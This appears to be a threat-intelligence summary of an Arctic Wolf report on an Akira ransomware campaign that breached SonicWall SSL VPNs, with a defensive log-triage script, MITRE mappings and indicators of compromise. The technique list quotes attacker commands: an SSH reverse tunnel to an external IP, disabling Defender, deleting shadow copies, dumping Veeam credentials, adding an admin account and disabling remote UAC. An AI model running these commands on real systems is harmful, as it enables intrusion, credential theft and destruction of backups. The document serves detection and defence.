Smash and Grab: Aggressive Akira Campaign Targets SonicWall VPNs, Deploys Ransomware in an Hour or Less – Arctic Wolf

Arctic Wolf observed an active campaign beginning July 21, 2025 that abused SonicWall SSL VPN access—often bypassing OTP MFA—to rapidly perform internal scanning and Impacket SMB discovery, extract Veeam credentials, and deploy Akira ransomware within hours. Early indicators included VPN logins from hosting-related ASNs, SMBv2 session setup requests consistent with Impacket use, and use of tools such as rclone and WinRAR for exfiltration. #CVE-2024-40766 #Akira

Keypoints

  • Threat actors gained access via SonicWall SSL VPN logins—often against accounts with OTP MFA enabled—likely leveraging credentials harvested from devices vulnerable to CVE-2024-40766.
  • Post-login activity was fast: internal port scanning, Impacket SMB activity, Active Directory enumeration, and lateral movement (often via RDP) typically began within minutes.
  • Attackers targeted Veeam Backup & Replication to extract VM and backup credentials using sqlcmd and a malicious PowerShell credential-extraction script supporting MSSQL and PostgreSQL.
  • Persistence and C2 involved creating local and domain accounts, installing RMM tools (AnyDesk, RustDesk), SSH reverse tunnels, and Cloudflared tunnels to maintain remote access.
  • Defense evasion included disabling EDR/Windows Defender, deleting shadow copies, disabling UAC via registry changes, and a BYOVD technique using the signed consent.exe to load malicious drivers (rwdrv.sys, hlpdrv.sys, hlpdrv/hlpdrv.sys) to tamper with kernel ACLs.
  • Data staging and exfiltration used WinRAR, rclone, and FileZilla to transfer archives to VPS infrastructure; ransomware (Akira/locker.exe/w.exe) encrypted systems within hours and deleted shadow copies.
  • Detection and mitigation recommendations: reset SSL VPN and AD credentials for devices that ran vulnerable firmware, monitor for hosting-related ASN logins and Impacket-like SMB session setups, block unnecessary VPN regions/VPS ranges, and enforce execution restrictions and kernel integrity protections.
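As an added example (not code from the Arctic Wolf report), a small triage routine over constructed log lines that flags the two early indicators the recommendations call out: SSL VPN logins from hosting-provider address space and SMB network logons from the threat-actor workstation names listed in the Indicators of Compromise section below. The SonicWall message fields, the Windows 4624 field layout and the hosting ranges (RFC 5737 placeholders) are assumptions.

```python
import ipaddress
import re

# Constructed hosting-provider watchlist (RFC 5737 documentation ranges used as
# placeholders); a real deployment would load prefixes for the hosting ASNs
# seen in the campaign from ASN-to-prefix data.
HOSTING_RANGES = [ipaddress.ip_network(c) for c in ("203.0.113.0/24", "198.51.100.0/24")]

# Workstation names the report associates with Impacket/SMB activity.
SUSPICIOUS_WKSTA = {"kali", "WINUTIL", "DESKTOP-A2S6P81"}

# Assumed SonicWall-style key=value layout: msg="..." src=<ip> usr="<user>".
VPN_RE = re.compile(r'msg="(?P<msg>[^"]+)".*?\bsrc=(?P<src>\d{1,3}(?:\.\d{1,3}){3})\b.*?\busr="(?P<usr>[^"]*)"')
# Assumed flattened Windows Security 4624 (network logon, type 3) layout.
SMB_RE = re.compile(r'EventID=4624\b.*?\bLogonType=3\b.*?\bWorkstationName=(?P<wksta>\S+)')


def is_hosting_ip(ip: str) -> bool:
    """True when the address falls inside a watchlisted hosting-provider range."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in HOSTING_RANGES)


def triage(lines):
    """Return (line_no, reason) tuples for lines matching either early indicator."""
    alerts = []
    for n, line in enumerate(lines, 1):
        m = VPN_RE.search(line)
        # Only a completed login counts; the preceding OTP prompt alone is not flagged.
        if m and m["msg"] == "SSL VPN zone remote user login allowed" and is_hosting_ip(m["src"]):
            alerts.append((n, f"vpn login for {m['usr']} from hosting range {m['src']}"))
            continue
        m = SMB_RE.search(line)
        if m and m["wksta"] in SUSPICIOUS_WKSTA:
            alerts.append((n, f"network logon from suspicious workstation {m['wksta']}"))
    return alerts


# Constructed sample log lines: an OTP challenge followed by a login from hosting
# space, a login from a non-watchlisted address, and two network logons.
SAMPLE_LOGS = [
    'time="2025-07-21 03:10:02" m=1080 msg="User needs one-time password" src=203.0.113.44 usr="jdoe"',
    'time="2025-07-21 03:10:09" m=1080 msg="SSL VPN zone remote user login allowed" src=203.0.113.44 usr="jdoe"',
    'time="2025-07-21 08:30:11" m=1080 msg="SSL VPN zone remote user login allowed" src=192.0.2.17 usr="asmith"',
    'EventID=4624 LogonType=3 TargetUserName=svc_backup WorkstationName=kali IpAddress=10.10.20.5',
    'EventID=4624 LogonType=3 TargetUserName=asmith WorkstationName=WS-FIN-07 IpAddress=10.10.30.2',
]

if __name__ == "__main__":
    for line_no, reason in triage(SAMPLE_LOGS):
        print(f"line {line_no}: {reason}")
```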

MITRE Techniques

  • [T1133] External Remote Services – Malicious SonicWall SSL VPN logins provided initial access. Quote: “SSL VPN zone remote user login allowed” and multiple login events originating from hosting-related ASNs.
  • [T1078] Valid Accounts – Threat actors authenticated using valid credentials, including accounts with OTP MFA enabled. Quote: “…otp login” and “User needs one-time password”.
  • [T1046] Network Service Discovery – Internal network scanning with tools such as SoftPerfect Network Scanner and Advanced IP Scanner for port discovery. Quote: “…port scanning, Impacket SMB activity…”
  • [T1135] Network Share Discovery – Share enumeration using SharpShares and other tools to find network shares. Quote: “SharpShares.exe /ldap:all /filter:netlogon,ipc$,print$ /threads:1000 /outfile:C:\programdata\tb.txt”.
  • [T1087.001/002] Account Discovery – Active Directory and local account enumeration via Get-ADUser/Get-ADComputer, nltest, dsquery. Quote: “Get-ADUser -Filter * -Properties * | Select-Object … > C:\ProgramData\AdUsers.txt”.
  • [T1021.001] Remote Desktop Protocol – Use of RDP for lateral movement following credential access. Quote: “RDP was the tool of choice for lateral movement through compromised environments.”
  • [T1021.002] SMB/Windows Admin Shares – Impacket SMBv2 session setup requests used for discovery and lateral movement. Quote: “SMBv2 session setup requests were observed, exhibiting a signature consistent with use of the Python Impacket library.”
  • [T1555] Credentials from Password Stores – Extraction of Veeam credentials from MSSQL/PostgreSQL databases using sqlcmd and a PowerShell credential-extraction script. Quote: “SELECT * FROM [VeeamBackup].[dbo].[Credentials];”
  • [T1136] Create Account – Creation of local and domain accounts like sqlbackup and veean for persistence and blending in. Quote: “net user sqlbackup REDACTED /add” and “net localgroup administrators sqlbackup /add”.
  • [T1112] Modify Registry – Registry modification to disable remote UAC restrictions via LocalAccountTokenFilterPolicy. Quote: “reg add "HKEY_LOCAL_MACHINE\…\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f”.
  • [T1548.002] Abuse Elevation Control Mechanism: Bypass UAC – Bypassing UAC to obtain elevated privileges for remote accounts. Quote: “Disabled remote UAC restrictions.”
  • [T1562] Impair Defenses – Disabling EDR and Windows Defender settings and deleting Volume Shadow Copies to impede recovery. Quote: “Set-MpPreference -DisableRealtimeMonitoring $true …” and “Get-WmiObject Win32_Shadowcopy | Remove-WmiObject”.
  • [T1204/T1055 implied] User Execution / Process Injection via BYOVD – Bring-your-own-vulnerable-driver technique using consent.exe to load malicious DLLs and drivers to disable security processes. Quote: “consent.exe acts as a launcher… loads a malicious DLL named msimg32.dll or wmsgapi.dll.”
  • [T1102] Web Service – Use of Cloudflared to create tunnels for command and control. Quote: “cloudflared.exe tunnel run --token REDACTED_BASE64_TOKEN”.
  • [T1219] Remote Access Tools – Installation and use of AnyDesk, RustDesk, and other RMM tools for remote control. Quote: “(new-object System.Net.WebClient).DownloadFile(‘hxxp://download[.]anydesk[.]com/AnyDesk.exe’…)”
  • [T1572] Protocol Tunneling – Use of SSH reverse tunnels and Cloudflared for covert access. Quote: “ssh -R 5555 [email protected][.]42” and Cloudflared tunnel usage.
  • [T1560] Archive Collected Data – Use of WinRAR to archive and split files for exfiltration with specific switches to target document/database files. Quote: “winrar.exe a -m0 -v3g -tn365d -n*.txt -n*.pdf …”.
  • [T1041/T1567] Exfiltration over C2 channels – Use of rclone and FileZilla to transfer archives to attacker-controlled VPS infrastructure. Quote: “C:\ProgramData\rclone\rclone.exe” and “fzsftp.exe” transferring RAR archives over SSH.
  • [T1486] Data Encrypted for Impact – Deployment of Akira ransomware to encrypt files and delete shadow copies. Quote: “akira.exe -n=1 -p=D: … Akira ransomware encrypts files and appends the .akira extension”.

Indicators of Compromise

  • [IPv4 Address] VPN client IPs observed tied to hosting ASNs – 38.114.123[.]167, 107.155.93[.]154 (and many other hosting-related IPs listed such as 45.66.249[.]93, 104.194.11[.]34).
  • [IPv4 Address] Exfiltration / C2 hosts – 162.210.196[.]101 (Leaseweb – C2), 206.168.190[.]143 (1gservers – exfiltration).
  • [Hostname] Threat actor workstation hostnames seen in SMB/Impacket activity – kali, WINUTIL, DESKTOP-A2S6P81 (used during discovery/lateral movement).
  • [File – SHA256/SHA1] Malicious drivers and binaries – 16f83f056177c4ec24c7e99d01ca9d9d6713bd0497eeedb777a3ffefa99c97f0 (SHA256) and 385c235f9f52c68ec4adc7ee07de26b84b108116 (SHA1) associated with BYOVD components like rwdrv.sys / churchill_driver.sys and hlpdrv.sys.
  • [Filenames] Ransomware and loaders observed – akira.exe, locker.exe, w.exe; and tooling paths like C:\ProgramData\rclone\rclone.exe, C:\ProgramData\AnyDesk.exe.

Read more: https://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/